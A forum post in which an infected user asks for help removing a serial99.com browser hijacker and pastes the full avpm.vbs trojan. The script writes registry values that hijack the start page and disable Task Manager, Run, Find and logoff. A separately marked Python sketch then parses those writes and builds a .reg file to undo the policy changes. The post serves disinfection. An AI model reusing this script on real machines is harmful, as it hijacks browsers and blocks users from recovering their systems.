Hi, I got the www serial99.com/?a infection where it redirected me to that url each time, it also disabled Run, Task manager, recent docs, etc.
There is this new avpm.vbs file in my C drive, I don't know if I can just delete it or have to run a fix? (I just renamed it to .txt so you can look at it and my virus scanner says it's trojan.vbs.disabler.b):
wscript.echo "Cracking... now! Click here for crack!"
itemtype = "REG_SZ"
mustboot = "www serial99.com"
jobfunc = "CRACKED!"
t = "Successfull!"
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
Set Kaspersky = WScript.CreateObject("WScript.Shell")
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Window Title", "Serial99.com","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","www serial99.com/?","REG_SZ"
Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRecentDocsMenu", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoClose", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"
-----------
Rootkit scan didn't find anything
I'm guessing to fix my recent docs etc. I just have to change these?:
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"=0 (0x0)
"DisableTaskMgr"=0 (0x0)
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoViewOnDrive"=0 (0x0)
"NoLogoff"=1
"NoRun"=1
"NoFind"=1
"NoRecentDocsMenu"=1
"NoClose"=1
----------
Also when I ran the AVG anti-spyware my Kaspersky picked up Backdoor.win32.sdbot.cic and deleted it.
By the way, before I came to this site I ran DSS (Deckard's System Scanner), which I think is based on ComboFix, so I'm including the log as it shows the HijackThis stuff that was removed, and the stuff ComboFix would have done. (Sorry about this, I know you don't want extra logs.)
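Added example, not part of the original post or of any tool named in it: a Python triage sketch that extracts the unique RegWrite targets from the avpm.vbs lines quoted above and builds a .reg file that deletes the values under Policies keys, returning the rest (Start Page, HideFileExt) for manual review. It assumes the double backslash in each path separates the key from the value name and that the policy values did not exist before the infection; the function names are hypothetical.

```python
import re

# Subset of the RegWrite lines quoted in the post (one duplicate kept on purpose).
SAMPLE = r'''
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"
'''

REGWRITE = re.compile(r'\.RegWrite\s+"([^"]+)"\s*,\s*"([^"]*)"\s*,\s*"([^"]+)"', re.I)
HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE"}

def parse_regwrites(text):
    """Return unique (key, value_name, data, type) tuples in script order."""
    seen = {}
    for path, data, typ in REGWRITE.findall(text):
        key, _, name = path.rpartition("\\")          # value name follows the last backslash
        hive, _, rest = key.rstrip("\\").partition("\\")
        full_key = HIVES.get(hive.upper(), hive) + "\\" + rest
        seen[(full_key, name)] = (data, typ.upper())  # later duplicates overwrite earlier ones
    return [(k, n, d, t) for (k, n), (d, t) in seen.items()]

def is_policy(key):
    """True when the key sits under a Policies branch."""
    return "\\policies\\" in key.lower() + "\\"

def build_revert_reg(entries):
    """Return (.reg text deleting policy values, non-policy entries for manual review)."""
    by_key, review = {}, []
    for key, name, data, _typ in entries:
        if is_policy(key):
            by_key.setdefault(key, []).append(name)
        else:
            review.append((key, name, data))
    lines = ["Windows Registry Editor Version 5.00", ""]
    for key, names in by_key.items():
        lines.append("[%s]" % key)
        lines += ['"%s"=-' % n for n in names]        # "Name"=- deletes the value on import
        lines.append("")
    return "\r\n".join(lines), review

if __name__ == "__main__":
    reg_text, review = build_revert_reg(parse_regwrites(SAMPLE))
    print(reg_text)
    for key, name, data in review:
        print("review manually: %s\\%s = %r" % (key, name, data))
```
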